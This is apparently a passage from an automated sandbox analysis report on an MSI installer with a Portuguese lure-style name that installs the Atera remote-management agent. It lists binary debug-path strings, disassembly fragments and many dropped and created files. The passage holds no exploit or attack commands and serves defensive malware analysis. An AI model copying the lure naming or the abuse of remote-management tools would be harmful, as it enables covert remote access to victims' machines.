                                Source: Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.AccessControl\net6.0-windows-Release\System.Security.AccessControl.pdb source: System.Security.AccessControl.dll.2.dr
                                Source: Binary string: System.Security.AccessControl.ni.pdb source: System.Security.AccessControl.dll.2.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Diagnostics.DiagnosticSource\net45\System.Diagnostics.DiagnosticSource.pdb source: System.Diagnostics.DiagnosticSource.dll.16.dr
                                Source: Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: .pdbV source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000E.00000002.1447177311.000001E7283F2000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll0.2.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000E.00000002.1447177311.000001E7283F2000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll0.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdb source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: CliWrap.pdbSHA256X source: CliWrap.dll.26.dr
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdbT*n* `*_CorDllMainmscoree.dll source: System.Runtime.Serialization.Json.dll.2.dr
                                Source: Binary string: D:\a\CliWrap\CliWrap\CliWrap.Signaler\obj\Release\net35\CliWrap.Signaler.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 00000037.00000002.2102333146.000001CC12CE2000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256^Y source: AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 00000033.00000000.1978260272.0000024844C32000.00000002.00000001.01000000.0000002A.sdmp
                                Source: System.Security.SecureString.dll.2.drStatic PE information: 0xF14EFAAA [Wed Apr 16 11:10:34 2098 UTC]
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC1910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,37_2_00007FFB02EC1910
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_3_04C3246F push esi; retn 0004h6_3_04C3247A
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_3_04C323A9 push ebp; retn 0004h6_3_04C323AA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 14_2_00007FFAAB56D45B push cs; retf 14_2_00007FFAAB56D465
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB5A0AD8 pushad ; ret 16_2_00007FFAAB5A0AE1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB59CE09 push ebx; retf 16_2_00007FFAAB59CE0A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB790F6C push eax; ret 16_2_00007FFAAB790F94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB5600BD pushad ; iretd 20_2_00007FFAAB5600C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB5500BD pushad ; iretd 22_2_00007FFAAB5500C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB565587 push ebp; iretd 22_2_00007FFAAB5655D8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFAAB5700BD pushad ; iretd 24_2_00007FFAAB5700C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB5625F2 push eax; iretd 26_2_00007FFAAB562671
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB55A658 push eax; retf 26_2_00007FFAAB55A669
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB55A652 push eax; retf 26_2_00007FFAAB55A669
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB760F7C push eax; ret 26_2_00007FFAAB760F94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB7726F5 push ds; ret 26_2_00007FFAAB7726FF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5AD2C5 pushad ; iretd 29_2_00007FFAAB5BAA45
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5A792B push ebx; retf 29_2_00007FFAAB5A796A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5AFEFA push FFFFFFE8h; retf 29_2_00007FFAAB5AFFF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5AFFB8 push FFFFFFE8h; retf 29_2_00007FFAAB5AFFF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB592D95 push eax; ret 29_2_00007FFAAB592E1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5AD350 push eax; iretd 29_2_00007FFAAB5BBB3B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5900BD pushad ; iretd 29_2_00007FFAAB5900C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5A8163 push ebx; ret 29_2_00007FFAAB5A816A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB59F650 push eax; iretd 29_2_00007FFAAB59F65D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB58F4B9 pushad ; ret 32_2_00007FFAAB58F66D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5952FA push edx; iretd 32_2_00007FFAAB596E3B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB597C2E pushad ; retf 32_2_00007FFAAB597C5D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB597C5E push eax; retf 32_2_00007FFAAB597C6D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5800BD pushad ; iretd 32_2_00007FFAAB5800C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB59699C push eax; ret 32_2_00007FFAAB59699D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB587963 push ebx; retf 32_2_00007FFAAB58796A
                                Source: System.Runtime.Numerics.dll.2.drStatic PE information: section name: .text entropy: 6.855705489890712

                                Persistence and Installation Behavior

                                barindex
                                Creates files in the system32 config directory
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMarketplace.exe.log
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI48B.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Intrinsics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.CSharp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Registry.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBCF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c9995.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7187.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\hostpolicy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI64A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Console.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Uri.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB4E8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c9997.rbf (copy)Jump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
